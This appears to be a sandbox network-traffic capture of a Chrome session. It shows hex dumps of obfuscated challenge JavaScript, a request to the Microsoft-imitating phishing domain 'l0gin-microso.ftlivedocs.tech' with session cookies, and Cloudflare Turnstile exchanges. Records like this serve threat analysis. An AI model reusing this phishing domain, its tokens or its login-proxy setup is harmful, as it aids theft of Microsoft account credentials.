                                                                                                                              2024-10-04 13:11:04 UTC1369INData Raw: 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 39 33 32 38 32 38 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 31 30 31 39 29 5d 2c 65 4d 5b 67 49 28 37 37 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 67 57 2c 65 29 7b 65 3d 28 67 57 3d 67 49 2c 7b 27 4b 4d 78 47 66 27 3a 67 57 28 34 35 37 29 2c 27 6d 72 64 76 73 27 3a 67 57 28 31 33 34 39 29 2c 27 58 56 5a 74 44 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 3d 3d 3d 68 7d 2c 27 61 46 42 52 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 28 68 29 7d 7d 29 3b 74 72 79 7b 69 66 28 65 5b 67 57 28 31 35 31 31 29
                                                                                                                              Data Ascii: ;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,932828),eM=this||self,eN=eM[gI(1019)],eM[gI(775)]=function(c,gW,e){e=(gW=gI,{'KMxGf':gW(457),'mrdvs':gW(1349),'XVZtD':function(g,h){return g===h},'aFBRz':function(g,h){return g(h)}});try{if(e[gW(1511)
                                                                                                                              2024-10-04 13:11:04 UTC1369INData Raw: 5b 67 5a 28 31 31 33 33 29 5d 3d 67 2c 6f 2e 63 63 3d 68 2c 6f 5b 67 5a 28 31 35 33 35 29 5d 3d 6e 2c 6f 5b 67 5a 28 39 37 38 29 5d 3d 47 2c 4a 53 4f 4e 5b 67 5a 28 31 36 37 39 29 5d 28 6f 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 78 3d 67 5a 28 39 37 37 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 45 5b 67 5a 28 31 32 34 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 42 3d 67 35 5b 67 5a 28 35 37 38 29 5d 28 73 29 5b 67 5a 28 31 32 37 39 29 5d 28 27 2b 27 2c 67 5a 28 31 36 38 39 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 37 27 3a 43 3d 6b 5b 67 5a 28 31 34 34 34 29 5d 28 6b 5b 67 5a 28 31 32 31 35 29 5d 28 6b 5b 67 5a 28 31 34 34 34 29 5d 28 6b 5b 67 5a 28 31 32
                                                                                                                              Data Ascii: [gZ(1133)]=g,o.cc=h,o[gZ(1535)]=n,o[gZ(978)]=G,JSON[gZ(1679)](o));continue;case'4':x=gZ(977);continue;case'5':E[gZ(1249)]=function(){};continue;case'6':B=g5[gZ(578)](s)[gZ(1279)]('+',gZ(1689));continue;case'7':C=k[gZ(1444)](k[gZ(1215)](k[gZ(1444)](k[gZ(12
                                                                                                                              2024-10-04 13:11:04 UTC1369INData Raw: 66 29 2c 68 5b 68 30 28 31 35 30 37 29 5d 28 68 30 28 37 34 39 29 2c 4a 53 4f 4e 5b 68 30 28 31 36 37 39 29 5d 28 67 29 29 5d 5b 68 30 28 37 39 39 29 5d 28 68 5b 68 30 28 31 37 32 32 29 5d 29 2c 65 4d 5b 68 30 28 36 38 34 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 32 29 7b 68 32 3d 68 30 2c 65 4d 5b 68 32 28 31 33 38 32 29 5d 28 6b 2c 75 6e 64 65 66 69 6e 65 64 2c 68 5b 68 32 28 31 34 30 31 29 5d 29 7d 2c 31 30 29 2c 65 4d 5b 68 30 28 36 38 34 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 33 29 7b 68 33 3d 68 30 2c 65 4d 5b 68 33 28 36 34 32 29 5d 28 29 7d 2c 31 65 33 29 2c 65 4d 5b 68 30 28 31 30 39 38 29 5d 5b 68 30 28 31 32 37 30 29 5d 28 68 30 28 31 31 30 39 29 2c 6b 29 29 3b 72 65 74 75 72 6e 21 5b 5d 7d 2c 65 55 3d 7b 7d 2c 65 55 5b 67 49 28 34 39 34 29 5d 3d
                                                                                                                              Data Ascii: f),h[h0(1507)](h0(749),JSON[h0(1679)](g))][h0(799)](h[h0(1722)]),eM[h0(684)](function(h2){h2=h0,eM[h2(1382)](k,undefined,h[h2(1401)])},10),eM[h0(684)](function(h3){h3=h0,eM[h3(642)]()},1e3),eM[h0(1098)][h0(1270)](h0(1109),k));return![]},eU={},eU[gI(494)]=
                                                                                                                              2024-10-04 13:11:04 UTC1369INData Raw: 75 2c 66 55 5b 67 49 28 31 31 32 30 29 5d 3d 66 66 2c 66 55 5b 67 49 28 31 34 36 30 29 5d 3d 66 54 2c 66 55 5b 67 49 28 38 31 31 29 5d 3d 66 67 2c 66 55 5b 67 49 28 39 38 39 29 5d 3d 66 6b 2c 66 55 5b 67 49 28 33 38 32 29 5d 3d 66 68 2c 66 55 5b 67 49 28 31 32 35 39 29 5d 3d 66 63 2c 66 55 5b 67 49 28 33 30 33 29 5d 3d 66 62 2c 65 4d 5b 67 49 28 31 34 31 36 29 5d 3d 66 55 2c 65 4d 5b 67 49 28 31 35 35 30 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 49 28 39 31 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 4f 29 7b 69 66 28 69 4f 3d 67 49 2c 65 4d 5b 69 4f 28 31 35 35 30 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 69 4f 28 31 35 35 30 29 5d 3d 21 21 5b 5d 7d 2c 67 31 3d 30 2c 65 4e 5b 67 49 28 37 34 31 29 5d 3d 3d 3d 67 49 28 31 30 38 39 29 3f 65 4e 5b 67 49 28 31 34 30 38 29
                                                                                                                              Data Ascii: u,fU[gI(1120)]=ff,fU[gI(1460)]=fT,fU[gI(811)]=fg,fU[gI(989)]=fk,fU[gI(382)]=fh,fU[gI(1259)]=fc,fU[gI(303)]=fb,eM[gI(1416)]=fU,eM[gI(1550)]=![],eM[gI(915)]=function(iO){if(iO=gI,eM[iO(1550)])return;eM[iO(1550)]=!![]},g1=0,eN[gI(741)]===gI(1089)?eN[gI(1408)
                                                                                                                              2024-10-04 13:11:04 UTC1369INData Raw: 3a 69 5a 28 35 37 34 29 2c 27 68 78 72 75 69 27 3a 69 5a 28 31 33 35 31 29 2c 27 42 44 44 69 67 27 3a 69 5a 28 36 36 30 29 2c 27 52 4f 58 73 44 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 6d 7a 52 78 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 53 4b 71 78 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 48 75 45 52 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 65 4f 62 4b 62 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 6e 52 4f 62 64 27 3a 69 5a 28 31 30 32 39 29 2c 27 6d 44 52 70 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65
                                                                                                                              Data Ascii: :iZ(574),'hxrui':iZ(1351),'BDDig':iZ(660),'ROXsD':function(h,i){return i!=h},'mzRxT':function(h,i){return h<i},'SKqxw':function(h,i){return h!=i},'HuERp':function(h,i){return h&i},'eObKb':function(h,i){return h*i},'nRObd':iZ(1029),'mDRpM':function(h,i){re
                                                                                                                              2024-10-04 13:11:04 UTC1369INData Raw: 65 74 65 20 42 5b 43 5d 7d 65 6c 73 65 20 66 6f 72 28 4d 3d 78 5b 43 5d 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 6a 32 28 39 33 31 29 5d 28 48 2c 31 29 7c 31 26 4d 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 6a 32 28 33 39 35 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 43 3d 28 44 2d 2d 2c 30 3d 3d 44 26 26 28 44 3d 4d 61 74 68 5b 6a 32 28 31 33 33 38 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 78 5b 4c 5d 3d 45 2b 2b 2c 53 74 72 69 6e 67 28 4b 29 29 7d 69 66 28 43 21 3d 3d 27 27 29 7b 69 66 28 4f 62 6a 65 63 74 5b 6a 32 28 31 35 30 34 29 5d 5b 6a 32 28 38 30 35 29 5d 5b 6a 32 28 31 37 30 32 29 5d 28 42 2c 43 29 29 7b 69 66 28 64 5b 6a 32 28 31 35 31 32 29 5d 28 32 35 36 2c 43 5b 6a 32 28 36 32 34 29 5d 28 30 29 29 29
                                                                                                                              Data Ascii: ete B[C]}else for(M=x[C],s=0;s<F;H=d[j2(931)](H,1)|1&M,j-1==I?(I=0,G[j2(395)](o(H)),H=0):I++,M>>=1,s++);C=(D--,0==D&&(D=Math[j2(1338)](2,F),F++),x[L]=E++,String(K))}if(C!==''){if(Object[j2(1504)][j2(805)][j2(1702)](B,C)){if(d[j2(1512)](256,C[j2(624)](0)))
                                                                                                                              2024-10-04 13:11:04 UTC1369INData Raw: 7b 47 5b 6a 32 28 33 39 35 29 5d 28 6f 28 48 29 29 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 49 2b 2b 3b 72 65 74 75 72 6e 20 47 5b 6a 32 28 37 39 39 29 5d 28 27 27 29 7d 2c 27 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 6a 34 2c 6a 29 7b 69 66 28 6a 34 3d 69 5a 2c 64 5b 6a 34 28 31 30 31 37 29 5d 21 3d 3d 6a 34 28 31 34 32 39 29 29 7b 66 6f 72 28 74 68 69 73 2e 68 3d 64 5b 6a 34 28 31 33 36 39 29 5d 28 4d 2c 32 35 36 29 2c 74 68 69 73 2e 67 3d 64 5b 6a 34 28 33 31 32 29 5d 28 31 2c 33 65 34 2a 4e 5b 6a 34 28 31 30 39 39 29 5d 28 29 29 2c 6a 3d 30 3b 64 5b 6a 34 28 31 33 35 36 29 5d 28 32 35 36 2c 6a 29 3b 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 6a 5d 3d 64 5b 6a 34 28 31 33 39 38 29 5d 28 33 65 34 2a 74 68 69 73 2e 67 2c 4f 5b 6a 34 28 31 30 39 39 29 5d 28
                                                                                                                              Data Ascii: {G[j2(395)](o(H));break}}else I++;return G[j2(799)]('')},'j':function(h,j4,j){if(j4=iZ,d[j4(1017)]!==j4(1429)){for(this.h=d[j4(1369)](M,256),this.g=d[j4(312)](1,3e4*N[j4(1099)]()),j=0;d[j4(1356)](256,j);this.h[this.g^j]=d[j4(1398)](3e4*this.g,O[j4(1099)](
                                                                                                                              2024-10-04 13:11:04 UTC1369INData Raw: 38 33 29 5d 28 6f 2c 4a 2b 2b 29 29 2c 4b 7c 3d 28 64 5b 6a 36 28 31 33 34 37 29 5d 28 30 2c 4d 29 3f 31 3a 30 29 2a 47 2c 47 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 4b 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4b 3d 30 2c 4c 3d 4d 61 74 68 5b 6a 36 28 31 33 33 38 29 5d 28 32 2c 38 29 2c 47 3d 31 3b 4c 21 3d 47 3b 4d 3d 49 26 48 2c 49 3e 3e 3d 31 2c 49 3d 3d 30 26 26 28 49 3d 6a 2c 48 3d 64 5b 6a 36 28 31 33 36 39 29 5d 28 6f 2c 4a 2b 2b 29 29 2c 4b 7c 3d 28 64 5b 6a 36 28 33 39 37 29 5d 28 30 2c 4d 29 3f 31 3a 30 29 2a 47 2c 47 3c 3c 3d 31 29 3b 4e 3d 65 28 4b 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4b 3d 30 2c 4c 3d 4d 61 74 68 5b 6a 36 28 31 33 33 38 29 5d 28 32 2c 31 36 29 2c 47 3d 31 3b 64 5b 6a 36 28 31 30 32 36 29 5d 28 47 2c 4c 29 3b
                                                                                                                              Data Ascii: 83)](o,J++)),K|=(d[j6(1347)](0,M)?1:0)*G,G<<=1);switch(K){case 0:for(K=0,L=Math[j6(1338)](2,8),G=1;L!=G;M=I&H,I>>=1,I==0&&(I=j,H=d[j6(1369)](o,J++)),K|=(d[j6(397)](0,M)?1:0)*G,G<<=1);N=e(K);break;case 1:for(K=0,L=Math[j6(1338)](2,16),G=1;d[j6(1026)](G,L);


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              27192.168.2.1749796104.26.12.694432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:04 UTC1163OUTGET /favicon.ico HTTP/1.1
                                                                                                                              Host: l0gin-microso.ftlivedocs.tech
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                              Referer: https://l0gin-microso.ftlivedocs.tech/KUtIdFka
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Cookie: fNYe=896a8296dd752621a31badfb843ea3b9d58cbc46d6504a1582b16c1633cbccb4; cf_clearance=PnrrDIdUFnV3xXNKwU7Uk2KkvZUrRmLQ6VsqVSFs7iI-1728047462-1.2.1.1-KgyGMoX2WsyMGE_crV0QHN0PnWPTTT_vkrnfk6OUsXs.ZCFyIMeIhyPM5AaovJKdYX33b6XhxSMauVLxhud15UDF6qe_lUUn4z7DUAUZgquXnur2JBrKraoo31FHgtIWsUITRVzxmgHzvH3L3sRtyyvkXX55rBaE6wwFcRgFWsHKcOzBUkmtg.SYM871TLywvjL.S9lBf6XKCP1RA_4rE_E8nRcZe7.uq6YsjbK5vOgE7JsW9ukyLOepD1wU8T7pQ7FQYb9ZLbSWuiaz05fetoXoB9g1me566IfE.8W3ydmURQRK0le68jWlAR9ChGQtId1KGEdKLtkgMNrP.DUbgel24XyilarY80urzfUxbGWeV87XlXGmDq1MBeocoMX5
                                                                                                                              2024-10-04 13:11:04 UTC750INHTTP/1.1 404 Not Found
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:04 GMT
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: private
                                                                                                                              Nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                              P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                              Report-To: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+bno"}]}
                                                                                                                              X-Ms-Ests-Server: 2.1.19005.9 - NCUS ProdSlices
                                                                                                                              X-Ms-Request-Id: f263b88c-7eca-4adc-9de0-66f6a6630600
                                                                                                                              X-Ms-Srs: 1.P
                                                                                                                              CF-Cache-Status: BYPASS
                                                                                                                              Set-Cookie: x-ms-gateway-slice=estsfd; Path=/; HttpOnly; Secure; SameSite=None
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8cd56a6d09578c2f-EWR
                                                                                                                              2024-10-04 13:11:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              28192.168.2.1749797104.18.95.414432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:04 UTC925OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/147669712:1728044744:0OaiWMyJW7ZPxlqedXMft6P244b4nMflF1Cf4AK8E-k/8cd56a630cf741e3/fc3fc94e9e3547a HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Content-Length: 2745
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              Content-type: application/x-www-form-urlencoded
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              CF-Challenge: fc3fc94e9e3547a
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Origin: https://challenges.cloudflare.com
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/bth64/0x4AAAAAAAwd9hw5rvoDjM7I/auto/fbE/normal/auto/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:04 UTC2745OUTData Raw: 76 5f 38 63 64 35 36 61 36 33 30 63 66 37 34 31 65 33 3d 56 73 6b 4c 45 4c 64 4c 73 4c 74 4c 57 42 63 67 42 63 34 4c 42 52 4e 71 4a 69 42 33 63 4a 63 78 65 52 6b 4e 72 63 70 6c 63 33 37 4e 52 6c 6c 63 31 63 6c 24 33 76 66 4f 41 6c 63 62 4c 63 73 73 63 75 38 74 6c 71 63 67 63 38 6b 66 43 63 33 52 77 36 68 63 66 53 63 6a 4a 63 42 56 32 78 63 63 55 30 6a 41 63 51 73 53 6a 6f 34 41 64 42 69 63 6f 4c 33 4b 55 69 34 63 6c 71 7a 63 51 35 4f 77 45 6e 31 47 52 66 54 63 4b 31 79 77 5a 63 6f 24 6b 6b 63 4e 6c 63 75 67 58 6c 79 45 72 73 77 49 2d 71 36 41 72 79 78 62 43 70 6f 4c 66 56 66 24 66 37 58 4c 49 79 6f 4c 63 41 56 63 66 55 4e 6b 63 62 62 65 49 24 63 42 76 63 4b 52 73 76 46 46 64 68 6a 6c 71 63 48 55 6b 63 33 67 76 63 51 49 79 30 4c 4a 30 63 4e 36 71 63 6e 62
                                                                                                                              Data Ascii: v_8cd56a630cf741e3=VskLELdLsLtLWBcgBc4LBRNqJiB3cJcxeRkNrcplc37NRllc1cl$3vfOAlcbLcsscu8tlqcgc8kfCc3Rw6hcfScjJcBV2xccU0jAcQsSjo4AdBicoL3KUi4clqzcQ5OwEn1GRfTcK1ywZco$kkcNlcugXlyErswI-q6AryxbCpoLfVf$f7XLIyoLcAVcfUNkcbbeI$cBvcKRsvFFdhjlqcHUkc3gvcQIy0LJ0cN6qcnb
                                                                                                                              2024-10-04 13:11:04 UTC737INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:04 GMT
                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                              Content-Length: 162572
                                                                                                                              Connection: close
                                                                                                                              cf-chl-gen: kWHtfqzM2+dkQW7ttHcxBqGqHQIWo/E+/mQkCrlRUzepgE+0ZhmWy3gBPF4CTfmc00MWZPZIKDlyguaMBuckRfPe9Z2CO+59SZEMhj8MkrqDg0GCR0IUGdwPXfmhqh7FnIkFx2GWvzwfeo3jpPzVL+Ay1OrLvSTbKJsbZLHyH+TJQ463/y3CPmjjkCvJayxXfozYYBTGLF59GX5qUN5z44324zH5BJ+mH3t66us+hH5UNNO6UOJYJ8I62jQhWrNNkK/VNPKYvDRssnYtuRdr38Whql4S3Qm2MMdxVnR8BoVsx01huKNVozckVeqqgF6W9Jtk9H4mGueMNal8MJr1ViXZXPi+K5wlysd2mzCtBB1YLIat+0sigRe3hmumY+0OvIhHUoNxocBq5DCD+k1/NgWCyY6A9QoDbb5wKqW3DSg4EDpORizCfbqMZ6VNt+BYqWOXxfGW6McAdCD7fqb2CvVnglAQIM30IGl0cQuoQqiT1dlBVZCR4s7Gknsxyi6m1A==$rfmudkZke6Rpi3UY
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8cd56a6dbee4de98-EWR
                                                                                                                              2024-10-04 13:11:04 UTC632INData Raw: 6a 4c 71 70 71 6e 75 68 76 4b 4f 6b 67 5a 7a 42 77 5a 37 4b 79 37 44 45 73 73 47 38 6b 59 75 56 31 63 37 61 73 37 65 36 73 74 61 2f 72 74 53 37 6e 4a 32 2b 6f 72 7a 52 70 74 2f 67 7a 64 79 6f 79 65 48 52 35 74 76 68 78 4e 4f 30 38 72 58 58 32 2f 43 38 39 2f 4b 37 74 38 6f 43 34 2f 44 4f 34 74 6a 34 30 67 7a 67 42 67 6f 50 34 73 76 65 45 64 4d 47 47 4f 7a 56 45 68 62 61 31 41 33 64 44 64 67 52 34 52 4d 46 47 51 63 59 39 75 45 71 34 53 4d 48 43 66 6f 6e 37 75 51 6d 4c 78 4d 4f 43 42 45 4e 46 6a 41 58 48 69 38 51 47 69 49 7a 45 30 55 32 4f 69 51 6d 41 6a 63 45 51 69 35 47 43 77 6c 4c 44 69 67 4e 45 46 59 59 46 43 51 31 58 43 55 72 46 30 6b 76 47 69 42 50 48 6d 56 5a 55 6a 63 63 50 43 77 6d 54 55 39 63 57 6b 34 70 5a 44 46 43 54 7a 46 72 5a 6b 6c 79 63 33 4e
                                                                                                                              Data Ascii: jLqpqnuhvKOkgZzBwZ7Ky7DEssG8kYuV1c7as7e6sta/rtS7nJ2+orzRpt/gzdyoyeHR5tvhxNO08rXX2/C89/K7t8oC4/DO4tj40gzgBgoP4sveEdMGGOzVEhba1A3dDdgR4RMFGQcY9uEq4SMHCfon7uQmLxMOCBENFjAXHi8QGiIzE0U2OiQmAjcEQi5GCwlLDigNEFYYFCQ1XCUrF0kvGiBPHmVZUjccPCwmTU9cWk4pZDFCTzFrZklyc3N
                                                                                                                              2024-10-04 13:11:04 UTC1369INData Raw: 6a 33 74 55 6b 70 61 4e 69 57 2b 58 64 6f 53 61 66 4a 71 5a 64 34 4b 69 67 32 70 6c 6e 5a 47 53 68 61 2b 75 70 6e 4a 7a 73 6e 4b 34 69 4a 75 32 6c 6e 2b 59 6e 34 47 37 6d 70 61 47 6d 72 61 54 75 58 36 31 76 73 37 48 78 4d 72 54 7a 61 61 6f 72 5a 69 57 75 4b 2b 6e 6c 4c 2b 74 7a 4c 2b 5a 74 35 36 65 74 4f 57 7a 75 36 69 71 33 75 54 63 35 50 48 43 71 4d 72 4b 39 75 48 49 79 65 72 5a 37 2b 54 78 32 76 7a 77 2b 4f 2b 2f 31 72 2f 55 38 76 34 45 38 75 7a 72 35 51 33 48 36 73 72 53 34 67 76 50 44 39 48 78 31 75 49 54 47 2b 67 5a 2b 67 49 65 38 66 41 68 38 50 73 51 33 75 54 30 46 69 73 4b 41 43 48 39 37 50 76 71 4e 52 4d 49 4c 79 49 55 41 78 4d 5a 4f 41 31 42 4d 45 49 35 4f 42 4d 54 42 77 55 2b 43 69 62 39 51 77 31 50 55 45 49 4d 4a 53 49 48 44 55 35 50 4c 43 6f
                                                                                                                              Data Ascii: j3tUkpaNiW+XdoSafJqZd4Kig2plnZGSha+upnJzsnK4iJu2ln+Yn4G7mpaGmraTuX61vs7HxMrTzaaorZiWuK+nlL+tzL+Zt56etOWzu6iq3uTc5PHCqMrK9uHIyerZ7+Tx2vzw+O+/1r/U8v4E8uzr5Q3H6srS4gvPD9Hx1uITG+gZ+gIe8fAh8PsQ3uT0FisKACH97PvqNRMILyIUAxMZOA1BMEI5OBMTBwU+Cib9Qw1PUEIMJSIHDU5PLCo
                                                                                                                              2024-10-04 13:11:04 UTC1369INData Raw: 5a 52 56 6b 4b 43 54 63 47 43 54 5a 61 4a 6d 6e 61 4e 76 62 4a 6d 53 71 34 4f 6b 71 36 2b 42 70 5a 4f 5a 6d 34 36 33 66 6e 70 33 75 4c 6d 35 6c 49 47 31 74 59 53 63 68 62 71 61 75 73 65 48 76 38 4b 6f 6a 38 36 4d 76 39 4f 59 72 35 54 62 6a 37 79 2f 74 73 79 55 75 37 50 63 78 72 2b 65 35 73 66 6c 34 63 62 61 31 39 33 6d 30 61 76 44 31 74 36 74 72 71 2f 54 30 37 4c 46 75 63 7a 4f 7a 73 33 74 34 4f 50 65 41 64 7a 52 39 74 37 71 32 75 7a 76 42 51 66 65 44 50 51 49 33 77 77 55 35 39 66 70 32 4e 7a 75 39 4f 41 50 38 66 33 57 45 2f 55 6b 39 68 58 6b 46 67 37 70 44 4f 55 75 47 79 48 79 44 77 49 68 4d 44 55 36 2b 68 49 4a 44 68 51 2b 51 43 41 36 4f 66 30 39 2f 51 4d 44 4b 79 73 4d 4c 53 59 46 54 6c 49 37 48 69 4a 52 45 55 39 51 46 78 6b 59 4e 42 63 5a 57 7a 6b 75
                                                                                                                              Data Ascii: ZRVkKCTcGCTZaJmnaNvbJmSq4Okq6+BpZOZm463fnp3uLm5lIG1tYSchbqauseHv8Koj86Mv9OYr5Tbj7y/tsyUu7Pcxr+e5sfl4cba193m0avD1t6trq/T07LFuczOzs3t4OPeAdzR9t7q2uzvBQfeDPQI3wwU59fp2Nzu9OAP8f3WE/Uk9hXkFg7pDOUuGyHyDwIhMDU6+hIJDhQ+QCA6Of09/QMDKysMLSYFTlI7HiJREU9QFxkYNBcZWzku
                                                                                                                              2024-10-04 13:11:04 UTC1369INData Raw: 75 71 67 57 46 36 68 59 36 51 6a 4a 31 71 69 35 53 74 63 71 39 76 73 59 65 7a 71 72 68 38 72 72 71 69 65 4a 36 76 75 35 4b 6a 75 4a 79 56 67 35 6d 48 72 6f 71 4d 6f 63 58 41 72 35 44 53 71 72 4f 55 72 35 6e 48 6c 62 50 55 7a 5a 76 64 32 4c 75 79 30 4a 33 44 6f 62 2b 70 7a 61 58 44 71 63 6d 72 37 65 6a 50 72 63 72 48 34 4f 2b 78 7a 62 61 31 33 39 79 39 33 63 36 36 34 74 76 36 30 39 33 38 31 64 58 38 31 67 54 38 37 64 34 50 37 42 41 42 33 67 76 6a 34 39 4c 75 31 4f 58 65 32 64 4c 71 49 65 41 65 2b 42 44 6d 48 52 73 4b 48 68 58 35 36 51 34 45 4a 78 2f 76 37 67 6b 41 39 43 34 30 4f 43 63 36 4b 78 33 37 46 7a 49 6a 49 51 55 30 41 41 42 46 4a 54 6f 33 43 54 6b 70 4f 67 67 38 43 6b 45 39 53 55 6b 6d 4f 69 34 34 4e 68 70 56 4f 46 30 7a 4e 6c 55 67 4f 69 39 51 57
                                                                                                                              Data Ascii: uqgWF6hY6QjJ1qi5Stcq9vsYezqrh8rrqieJ6vu5KjuJyVg5mHroqMocXAr5DSqrOUr5nHlbPUzZvd2Luy0J3Dob+pzaXDqcmr7ejPrcrH4O+xzba139y93c664tv609381dX81gT87d4P7BAB3gvj49Lu1OXe2dLqIeAe+BDmHRsKHhX56Q4EJx/v7gkA9C40OCc6Kx37FzIjIQU0AABFJTo3CTkpOgg8CkE9SUkmOi44NhpVOF0zNlUgOi9QW
                                                                                                                              2024-10-04 13:11:04 UTC1369INData Raw: 34 67 6d 71 73 6c 49 57 4d 64 62 47 79 6a 35 65 58 64 5a 74 38 6d 36 42 37 77 33 6d 44 75 5a 44 41 76 70 2b 72 67 73 79 62 6c 36 47 6b 6d 39 47 30 70 39 4c 52 6f 4e 6e 43 79 4d 2b 53 7a 4d 7a 41 6f 4a 37 58 31 37 2f 68 6e 4b 66 6c 78 74 2f 49 32 75 75 67 37 73 33 65 76 73 6e 76 38 4d 6a 7a 71 76 50 6a 30 62 6e 33 35 2b 33 61 30 63 4c 6b 76 2f 48 47 32 74 33 6f 77 63 54 5a 35 2b 2f 65 34 67 6e 6b 37 65 58 71 45 73 33 56 46 51 7a 58 36 66 4c 71 2b 39 4c 34 46 68 4d 51 46 2f 48 36 47 42 50 34 34 65 77 4b 41 75 62 72 42 50 33 38 4e 76 30 50 4b 65 37 34 4f 50 49 4d 42 7a 7a 35 46 51 74 42 47 77 4d 50 48 45 6b 6f 47 77 4e 4d 50 43 4d 46 4a 53 77 73 48 53 52 4b 49 69 31 4b 4d 30 31 45 47 68 4e 4e 56 42 49 76 50 7a 45 7a 4c 69 52 42 4f 43 4e 54 4d 32 55 6a 4f 45
